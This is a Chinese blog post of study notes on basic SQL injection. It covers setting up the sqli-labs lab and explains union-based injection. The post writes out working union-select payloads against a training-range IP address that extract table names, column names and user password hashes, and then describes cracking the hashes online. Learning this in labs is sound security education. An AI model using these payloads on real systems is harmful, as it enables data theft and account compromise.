<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/icon32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/icon16.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Noto Serif SC:300,300italic,400,400italic,700,700italic|Extra-light 200:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">
<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"umli0.github.io","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":40,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":"ture"},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":"ture","trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="小迪安全学习|WEB漏洞|SQL注入之SQL简要注入">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL注入之SQL简要注入">
<meta property="og:url" content="https://umli0.github.io/2021/08/03/SQL%E6%B3%A8%E5%85%A5%E4%B9%8BSQL%E7%AE%80%E8%A6%81%E6%B3%A8%E5%85%A5/index.html">
<meta property="og:site_name" content="黒猫的博客">
<meta property="og:description" content="小迪安全学习|WEB漏洞|SQL注入之SQL简要注入">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://img-blog.csdnimg.cn/d53d65100b2d4021bc37277f6a08e15f.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzUxOTQzOTc2,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/9b141cbe017c48358ab53048719abc00.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/6e9675a6f3164949bbc6440d9bfd0d91.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzUxOTQzOTc2,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/fd7317fae1ee49ab86a39876bfa0f699.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzUxOTQzOTc2,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/0010589e659f4c1e861109c14b6512c5.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzUxOTQzOTc2,size_16,color_FFFFFF,t_70#pic_center">
<meta property="article:published_time" content="2021-08-03T08:20:57.000Z">
<meta property="article:modified_time" content="2021-09-16T02:53:01.973Z">
<meta property="article:author" content="黒猫">
<meta property="article:tag" content="SQL注入">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://img-blog.csdnimg.cn/d53d65100b2d4021bc37277f6a08e15f.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzUxOTQzOTc2,size_16,color_FFFFFF,t_70">

<link rel="canonical" href="https://umli0.github.io/2021/08/03/SQL%E6%B3%A8%E5%85%A5%E4%B9%8BSQL%E7%AE%80%E8%A6%81%E6%B3%A8%E5%85%A5/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>SQL注入之SQL简要注入 | 黒猫的博客</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">黒猫的博客</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">一个中二病的学习日记</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://umli0.github.io/2021/08/03/SQL%E6%B3%A8%E5%85%A5%E4%B9%8BSQL%E7%AE%80%E8%A6%81%E6%B3%A8%E5%85%A5/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/5.jpg">
      <meta itemprop="name" content="黒猫">
      <meta itemprop="description" content="活在当下 为所当为 顺其自然">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="黒猫的博客">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          SQL注入之SQL简要注入
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2021-08-03 16:20:57" itemprop="dateCreated datePublished" datetime="2021-08-03T16:20:57+08:00">2021-08-03</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2021-09-16 10:53:01" itemprop="dateModified" datetime="2021-09-16T10:53:01+08:00">2021-09-16</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/" itemprop="url" rel="index"><span itemprop="name">网络安全</span></a>
                </span>
            </span>

          
            <div class="post-description">小迪安全学习|WEB漏洞|SQL注入之SQL简要注入</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="忍者安全系统"><a href="#忍者安全系统" class="headerlink" title="忍者安全系统"></a>忍者安全系统</h1><p>自己搭一下<br>里面涉及到后续需要的工具都有，就不需要自己去下载了</p>
<h1 id="SQL注入安全测试中的危害"><a href="#SQL注入安全测试中的危害" class="headerlink" title="SQL注入安全测试中的危害"></a>SQL注入安全测试中的危害</h1><p>1.危害到数据库中的数据</p>
<p>2.危害到网站的权限</p>
<h1 id="SQL注入产生的原理"><a href="#SQL注入产生的原理" class="headerlink" title="SQL注入产生的原理"></a>SQL注入产生的原理</h1><p>SQL语句若没有定义变量就不能SQL注入<br>存在可控变量 带入数据库查询 变量为存在过滤或过滤不严谨</p>
<h1 id="安装sqli-labs"><a href="#安装sqli-labs" class="headerlink" title="安装sqli-labs"></a>安装sqli-labs</h1><h2 id="下载"><a href="#下载" class="headerlink" title="下载"></a>下载</h2><p>去这里下载<br><a target="_blank" rel="noopener" href="https://github.com/Audi-1/sqli-labs">https://github.com/Audi-1/sqli-labs</a></p>
<p>##下载phpstudy</p>
<h2 id="将解压后的sqli-labs的包放置于phpstudy根目录下的www文件夹内"><a href="#将解压后的sqli-labs的包放置于phpstudy根目录下的www文件夹内" class="headerlink" title="将解压后的sqli-labs的包放置于phpstudy根目录下的www文件夹内"></a>将解压后的sqli-labs的包放置于phpstudy根目录下的www文件夹内</h2><h2 id="要注意两个问题"><a href="#要注意两个问题" class="headerlink" title="要注意两个问题"></a>要注意两个问题</h2><h3 id="1-php版本"><a href="#1-php版本" class="headerlink" title="1.php版本"></a>1.php版本</h3><p>php-7.X.X好像不行会报错<br>重新下个其它版本的php<br><img src="https://img-blog.csdnimg.cn/d53d65100b2d4021bc37277f6a08e15f.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzUxOTQzOTc2,size_16,color_FFFFFF,t_70"></p>
<h3 id="2-配置"><a href="#2-配置" class="headerlink" title="2.配置"></a>2.配置</h3><p><code>phpstudy_pro\WWW\sqli-labs-master、sql-connection</code>找<code>db-creds.inc</code><br>配置<br><img src="https://img-blog.csdnimg.cn/9b141cbe017c48358ab53048719abc00.png"><br>用户名，密码，记住name的值</p>
<p><img src="https://img-blog.csdnimg.cn/6e9675a6f3164949bbc6440d9bfd0d91.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzUxOTQzOTc2,size_16,color_FFFFFF,t_70"><br>新建一个数据库，把密码，用户名，和记的name的值填入数据库名称中</p>
<h3 id="3-试试"><a href="#3-试试" class="headerlink" title="3.试试"></a>3.试试</h3><p>打开phpstudy的 apache和mysql</p>
<p>然后网页输入<a target="_blank" rel="noopener" href="http://localhost/sqli-labs-master/">http://localhost/sqli-labs-master/</a><br>得<br><img src="https://img-blog.csdnimg.cn/fd7317fae1ee49ab86a39876bfa0f699.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzUxOTQzOTc2,size_16,color_FFFFFF,t_70"></p>
<p>点击<br><code>Setup/reset Database for labs</code></p>
<p>然后就可以了</p>
<h1 id="SQL注入讲解"><a href="#SQL注入讲解" class="headerlink" title="SQL注入讲解"></a>SQL注入讲解</h1><p><img src="https://img-blog.csdnimg.cn/0010589e659f4c1e861109c14b6512c5.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzUxOTQzOTc2,size_16,color_FFFFFF,t_70#pic_center"></p>
<h2 id="1-信息收集"><a href="#1-信息收集" class="headerlink" title="1.信息收集"></a>1.信息收集</h2><h2 id="2-如何判定是否有注入点"><a href="#2-如何判定是否有注入点" class="headerlink" title="2.如何判定是否有注入点"></a>2.如何判定是否有注入点</h2><p>老方法： </p>
<p>and 1=1 页面正确</p>
<p>and 1=2 页面错误</p>
<p>可能存在注入点</p>
<p>新方法：</p>
<p>网站- 表名-列名-数据</p>
<p>判断注入<br>猜解列名数量（字段数） order by * 错误与正常的正常值</p>
<p>报错猜解<br>union select 1,2,3,4</p>
<h2 id="然后进入信息收集部分"><a href="#然后进入信息收集部分" class="headerlink" title="然后进入信息收集部分"></a>然后进入信息收集部分</h2><p>数据库版本 version()</p>
<p>数据库名字 database()</p>
<p>数据库用户 user()</p>
<p>操作系统 @@version_compile_</p>
<p>id 后加报错猜解部分<br>得到2，将2部分改为database(),version() 查询数据库版本和数据库名字</p>
<h2 id="根据收集到的基本数据，进一步数据注入"><a href="#根据收集到的基本数据，进一步数据注入" class="headerlink" title="根据收集到的基本数据，进一步数据注入"></a>根据收集到的基本数据，进一步数据注入</h2><h3 id="1"><a href="#1" class="headerlink" title="1."></a>1.</h3><p>其中知道了数据库的版本<br>必要知识点：在MYSQL5.0中，mysql存在一个自带数据库名为information_schema,它是一个存储记录有所有数据库名，表名，列名的数据库，也相当于可以通过查询它获取指定数据库下面的表名或列名。</p>
<h3 id="2"><a href="#2" class="headerlink" title="2."></a>2.</h3><p>数据库中符号”.”代表下一级，如xiaodi.user表示xiaodi数据库下的user表名</p>
<p>information_schema.tables :记录所有表名信息的表</p>
<p>information_schema.columns :记录所有列名信息的表</p>
<p>table_name :表名</p>
<p>column_name :列名</p>
<h1 id="查询"><a href="#查询" class="headerlink" title="查询"></a>查询</h1><h2 id="查询指定数据库下的表名信息："><a href="#查询指定数据库下的表名信息：" class="headerlink" title="查询指定数据库下的表名信息："></a>查询指定数据库下的表名信息：</h2><p><a target="_blank" rel="noopener" href="http://http//219.153.49.228:44543/new_list.php?id=-1">http://http://219.153.49.228:44543/new_list.php?id=-1</a> union select 1,table_name,3,4 from information_schema.tables where table_schema=’mozhe_Discuz_StormGroup’</p>
<p>得到表名StormGroup_member</p>
<hr>
<p>然后</p>
<h2 id="查询指定表名StormGroup-member下的列名信息"><a href="#查询指定表名StormGroup-member下的列名信息" class="headerlink" title="查询指定表名StormGroup_member下的列名信息"></a>查询指定表名StormGroup_member下的列名信息</h2><p><a target="_blank" rel="noopener" href="http://http//219.153.49.228:44543/new_list.php?id=-1">http://http://219.153.49.228:44543/new_list.php?id=-1</a> union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=’StormGroup_member’</p>
<p>得到列名<br>id,name,password,status</p>
<hr>
<h2 id="查询指定数据"><a href="#查询指定数据" class="headerlink" title="查询指定数据"></a>查询指定数据</h2><p><a target="_blank" rel="noopener" href="http://http//219.153.49.228:44543/new_list.php?id=-1">http://http://219.153.49.228:44543/new_list.php?id=-1</a> union select 1,name,password,4  from StormGroup_member</p>
<h2 id="得到密码"><a href="#得到密码" class="headerlink" title="得到密码"></a>得到密码</h2><p>然后就得到加密密码，把密码去在线破解网站，如CMD5解密后得到密码</p>
<p>重点就是数据库查询语句<br>回去复习一下，把之前学过的数据库整一个博客出来</p>
<h1 id="猜解多个数据可采用limit-x-1变动猜解"><a href="#猜解多个数据可采用limit-x-1变动猜解" class="headerlink" title="猜解多个数据可采用limit x,1变动猜解"></a>猜解多个数据可采用limit x,1变动猜解</h1>
    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/SQL%E6%B3%A8%E5%85%A5/" rel="tag"># SQL注入</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/08/03/java3/" rel="prev" title="java3">
      <i class="fa fa-chevron-left"></i> java3
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/08/05/java4/" rel="next" title="java4">
      java4 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%BF%8D%E8%80%85%E5%AE%89%E5%85%A8%E7%B3%BB%E7%BB%9F"><span class="nav-number">1.</span> <span class="nav-text">忍者安全系统</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#SQL%E6%B3%A8%E5%85%A5%E5%AE%89%E5%85%A8%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84%E5%8D%B1%E5%AE%B3"><span class="nav-number">2.</span> <span class="nav-text">SQL注入安全测试中的危害</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#SQL%E6%B3%A8%E5%85%A5%E4%BA%A7%E7%94%9F%E7%9A%84%E5%8E%9F%E7%90%86"><span class="nav-number">3.</span> <span class="nav-text">SQL注入产生的原理</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%AE%89%E8%A3%85sqli-labs"><span class="nav-number">4.</span> <span class="nav-text">安装sqli-labs</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%8B%E8%BD%BD"><span class="nav-number">4.1.</span> <span class="nav-text">下载</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%B0%86%E8%A7%A3%E5%8E%8B%E5%90%8E%E7%9A%84sqli-labs%E7%9A%84%E5%8C%85%E6%94%BE%E7%BD%AE%E4%BA%8Ephpstudy%E6%A0%B9%E7%9B%AE%E5%BD%95%E4%B8%8B%E7%9A%84www%E6%96%87%E4%BB%B6%E5%A4%B9%E5%86%85"><span class="nav-number">4.2.</span> <span class="nav-text">将解压后的sqli-labs的包放置于phpstudy根目录下的www文件夹内</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%A6%81%E6%B3%A8%E6%84%8F%E4%B8%A4%E4%B8%AA%E9%97%AE%E9%A2%98"><span class="nav-number">4.3.</span> <span class="nav-text">要注意两个问题</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-php%E7%89%88%E6%9C%AC"><span class="nav-number">4.3.1.</span> <span class="nav-text">1.php版本</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-%E9%85%8D%E7%BD%AE"><span class="nav-number">4.3.2.</span> <span class="nav-text">2.配置</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-%E8%AF%95%E8%AF%95"><span class="nav-number">4.3.3.</span> <span class="nav-text">3.试试</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#SQL%E6%B3%A8%E5%85%A5%E8%AE%B2%E8%A7%A3"><span class="nav-number">5.</span> <span class="nav-text">SQL注入讲解</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="nav-number">5.1.</span> <span class="nav-text">1.信息收集</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-%E5%A6%82%E4%BD%95%E5%88%A4%E5%AE%9A%E6%98%AF%E5%90%A6%E6%9C%89%E6%B3%A8%E5%85%A5%E7%82%B9"><span class="nav-number">5.2.</span> <span class="nav-text">2.如何判定是否有注入点</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%84%B6%E5%90%8E%E8%BF%9B%E5%85%A5%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%E9%83%A8%E5%88%86"><span class="nav-number">5.3.</span> <span class="nav-text">然后进入信息收集部分</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%A0%B9%E6%8D%AE%E6%94%B6%E9%9B%86%E5%88%B0%E7%9A%84%E5%9F%BA%E6%9C%AC%E6%95%B0%E6%8D%AE%EF%BC%8C%E8%BF%9B%E4%B8%80%E6%AD%A5%E6%95%B0%E6%8D%AE%E6%B3%A8%E5%85%A5"><span class="nav-number">5.4.</span> <span class="nav-text">根据收集到的基本数据，进一步数据注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1"><span class="nav-number">5.4.1.</span> <span class="nav-text">1.</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2"><span class="nav-number">5.4.2.</span> <span class="nav-text">2.</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%9F%A5%E8%AF%A2"><span class="nav-number">6.</span> <span class="nav-text">查询</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9F%A5%E8%AF%A2%E6%8C%87%E5%AE%9A%E6%95%B0%E6%8D%AE%E5%BA%93%E4%B8%8B%E7%9A%84%E8%A1%A8%E5%90%8D%E4%BF%A1%E6%81%AF%EF%BC%9A"><span class="nav-number">6.1.</span> <span class="nav-text">查询指定数据库下的表名信息：</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9F%A5%E8%AF%A2%E6%8C%87%E5%AE%9A%E8%A1%A8%E5%90%8DStormGroup-member%E4%B8%8B%E7%9A%84%E5%88%97%E5%90%8D%E4%BF%A1%E6%81%AF"><span class="nav-number">6.2.</span> <span class="nav-text">查询指定表名StormGroup_member下的列名信息</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9F%A5%E8%AF%A2%E6%8C%87%E5%AE%9A%E6%95%B0%E6%8D%AE"><span class="nav-number">6.3.</span> <span class="nav-text">查询指定数据</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%BE%97%E5%88%B0%E5%AF%86%E7%A0%81"><span class="nav-number">6.4.</span> <span class="nav-text">得到密码</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%8C%9C%E8%A7%A3%E5%A4%9A%E4%B8%AA%E6%95%B0%E6%8D%AE%E5%8F%AF%E9%87%87%E7%94%A8limit-x-1%E5%8F%98%E5%8A%A8%E7%8C%9C%E8%A7%A3"><span class="nav-number">7.</span> <span class="nav-text">猜解多个数据可采用limit x,1变动猜解</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="黒猫"
      src="/images/5.jpg">
  <p class="site-author-name" itemprop="name">黒猫</p>
  <div class="site-description" itemprop="description">活在当下 为所当为 顺其自然</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">59</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">9</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">45</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title"><i class="fa fa-link fa-fw"></i>
      链接
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://blog.csdn.net/m0_51943976" title="https:&#x2F;&#x2F;blog.csdn.net&#x2F;m0_51943976" rel="noopener" target="_blank">CSDN</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://github.com/umli0" title="https:&#x2F;&#x2F;github.com&#x2F;umli0" rel="noopener" target="_blank">Github</a>
        </li>
    </ul>
  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>



      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">黒猫</span>
</div>

<!--
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://pisces.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> 强力驱动
  </div>
-->

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
